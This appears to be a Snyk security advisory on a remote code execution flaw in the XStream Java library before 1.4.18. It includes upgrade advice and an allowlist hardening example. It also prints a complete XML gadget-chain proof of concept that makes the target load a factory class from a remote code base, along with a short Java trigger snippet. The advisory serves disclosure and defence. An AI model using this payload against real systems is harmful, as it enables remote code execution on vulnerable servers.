Arbitrary Code Execution Affecting com.thoughtworks.xstream:xstream package, versions [,1.4.18)


  • Severity

    high
  • Exploit Maturity

    Proof of concept

  • Attack Complexity

    High

  • Scope

    Changed

  • Confidentiality

    High

  • Integrity

    High

  • Availability

    High

  • snyk-id

    SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569179

  • published

    24 Aug 2021

  • disclosed

    24 Aug 2021

  • credit

    Smi1e

How to fix?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

Overview

com.thoughtworks.xstream:xstream is a library that serializes Java objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. By manipulating the processed input stream alone, a remote attacker may cause the application to load and execute arbitrary code from a remote host. Users who followed the recommendation to set up XStream's security framework with an allowlist limited to the minimal required types are not affected. As of XStream 1.4.18 the library no longer uses a blacklist by default, because a blacklist cannot be made secure for general-purpose use.
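The allowlist setup the advisory refers to, written out as an added example (this is not code from the Snyk page or from the XStream project; the `Order` type and the benign input are assumed for illustration). It clears every default permission, including the old blacklist, and re-admits only the types the application actually needs, so an unexpected root element such as the PoC's javax.swing.event.EventListenerList is rejected before any nested gadget is instantiated:

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

import java.util.ArrayList;

public class XStreamAllowlistDemo {

    /** The only application type this example needs to unmarshal (assumed for illustration). */
    public static class Order {
        public String id;
        public int quantity;
    }

    /** Builds an XStream instance that rejects every type not explicitly allowed. */
    public static XStream hardenedXStream() {
        XStream xstream = new XStream();
        // Drop all default permissions, including the pre-1.4.18 blacklist.
        xstream.addPermission(NoTypePermission.NONE);
        // Re-admit only what the application needs: null, primitives and their wrappers,
        // String, one collection type, and the application's own model class.
        xstream.addPermission(NullPermission.NULL);
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
        xstream.allowTypes(new Class[] { String.class, ArrayList.class, Order.class });
        xstream.alias("order", Order.class);
        return xstream;
    }

    /** Unmarshals xml and reports either the resulting class or the type that was refused. */
    public static String tryUnmarshal(XStream xstream, String xml) {
        try {
            Object o = xstream.fromXML(xml);
            return "ok: " + o.getClass().getName();
        } catch (ForbiddenClassException e) {
            // Thrown by the security framework as soon as a disallowed type is encountered.
            return "rejected: " + e.getMessage();
        }
    }

    public static void main(String[] args) {
        XStream xstream = hardenedXStream();

        // Constructed benign input: the document shape the application expects.
        String benign = "<order><id>A-1</id><quantity>3</quantity></order>";
        System.out.println(tryUnmarshal(xstream, benign));

        // Constructed hostile input: the outermost element of the advisory's PoC. The allowlist
        // refuses javax.swing.event.EventListenerList, so the nested chain is never touched.
        String hostile = "<javax.swing.event.EventListenerList serialization='custom'>"
                + "<javax.swing.event.EventListenerList><default><listenerList/></default>"
                + "</javax.swing.event.EventListenerList></javax.swing.event.EventListenerList>";
        System.out.println(tryUnmarshal(xstream, hostile));
    }
}
```

Upgrading to 1.4.18 removes the unsafe blacklist default, but an explicit allowlist like this is still the recommended configuration on every version: it fails closed for any future gadget chain built from JDK or third-party types, and the set of permitted classes is reviewable in one place.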

PoC

The following document, unmarshalled by an affected version in its default configuration, chains JDK types down to a com.sun.jndi.ldap.LdapBindingEnumeration whose entry carries javaCodeBase, javaClassName and javaFactory attributes. These describe a JNDI Reference, and resolving it loads the named object factory class from the attacker-controlled code base. Note that on JDK 8u191, 11.0.1 and later, loading a factory from a remote URL code base additionally requires com.sun.jndi.ldap.object.trustURLCodebase to be set to true.

<javax.swing.event.EventListenerList serialization='custom'>
  <javax.swing.event.EventListenerList>
    <default>
      <listenerList>
        <javax.swing.undo.UndoManager>
          <hasBeenDone>true</hasBeenDone>
          <alive>true</alive>
          <inProgress>true</inProgress>
          <edits>
            <com.sun.xml.internal.ws.api.message.Packet>
              <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
                <parsedMessage>true</parsedMessage>
                <soapVersion>SOAP_11</soapVersion>
                <bodyParts/>
                <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
                  <attachmentsInitialized>false</attachmentsInitialized>
                  <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
                    <soapPart/>
                    <mm>
                      <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                        <aliases class='com.sun.jndi.ldap.LdapBindingEnumeration'>
                          <cleaned>false</cleaned>
                          <entries>
                            <com.sun.jndi.ldap.LdapEntry>
                              <DN>cn=four,cn=three,cn=two,cn=one</DN>
                              <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>
                                <javax.naming.directory.BasicAttribute>
                                  <default>
                                    <ignoreCase>false</ignoreCase>
                                  </default>
                                  <int>4</int>
                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                                    <javax.naming.directory.BasicAttribute>
                                      <default>
                                        <ordered>false</ordered>
                                        <attrID>objectClass</attrID>
                                      </default>
                                      <int>1</int>
                                      <string>javanamingreference</string>
                                    </javax.naming.directory.BasicAttribute>
                                    <com.sun.jndi.ldap.LdapAttribute>
                                      <default>
                                        <rdn class='com.sun.jndi.ldap.LdapName' serialization='custom'>
                                          <com.sun.jndi.ldap.LdapName>
                                            <string>cn=four,cn=three,cn=two,cn=one</string>
                                            <boolean>false</boolean>
                                          </com.sun.jndi.ldap.LdapName>
                                        </rdn>
                                      </default>
                                    </com.sun.jndi.ldap.LdapAttribute>
                                  </com.sun.jndi.ldap.LdapAttribute>
                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                                    <javax.naming.directory.BasicAttribute>
                                      <default>
                                        <ordered>false</ordered>
                                        <attrID>javaCodeBase</attrID>
                                      </default>
                                      <int>1</int>
                                      <string>http://127.0.0.1:8080/</string>
                                    </javax.naming.directory.BasicAttribute>
                                    <com.sun.jndi.ldap.LdapAttribute>
                                      <default/>
                                    </com.sun.jndi.ldap.LdapAttribute>
                                  </com.sun.jndi.ldap.LdapAttribute>
                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                                    <javax.naming.directory.BasicAttribute>
                                      <default>
                                        <ordered>false</ordered>
                                        <attrID>javaClassName</attrID>
                                      </default>
                                      <int>1</int>
                                      <string>refObj</string>
                                    </javax.naming.directory.BasicAttribute>
                                    <com.sun.jndi.ldap.LdapAttribute>
                                      <default/>
                                    </com.sun.jndi.ldap.LdapAttribute>
                                  </com.sun.jndi.ldap.LdapAttribute>
                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>
                                    <javax.naming.directory.BasicAttribute>
                                      <default>
                                        <ordered>false</ordered>
                                        <attrID>javaFactory</attrID>
                                      </default>
                                      <int>1</int>
                                      <string>ExecTemplateJDK7</string>
                                    </javax.naming.directory.BasicAttribute>
                                    <com.sun.jndi.ldap.LdapAttribute>
                                      <default/>
                                    </com.sun.jndi.ldap.LdapAttribute>
                                  </com.sun.jndi.ldap.LdapAttribute>
                                </javax.naming.directory.BasicAttribute>
                              </attributes>
                            </com.sun.jndi.ldap.LdapEntry>
                          </entries>
                          <limit>2</limit>
                          <posn>0</posn>
                          <homeCtx/>
                          <more>true</more>
                          <hasMoreCalled>true</hasMoreCalled>
                        </aliases>
                      </it>
                    </mm>
                  </multiPart>
                </sm>
              </message>
            </com.sun.xml.internal.ws.api.message.Packet>
          </edits>
          <indexOfNextAdd>0</indexOfNextAdd>
          <limit>100</limit>
        </javax.swing.undo.UndoManager>
      </listenerList>
    </default>
    <string>java.lang.InternalError</string>
    <javax.swing.undo.UndoManager reference='../default/listenerList/javax.swing.undo.UndoManager'/>
    <null/>
  </javax.swing.event.EventListenerList>
</javax.swing.event.EventListenerList>

Unmarshalling the payload with an XStream instance left in its default (blacklist) configuration triggers the chain:

import com.thoughtworks.xstream.XStream;

// xml holds the PoC document above
XStream xstream = new XStream();
xstream.fromXML(xml);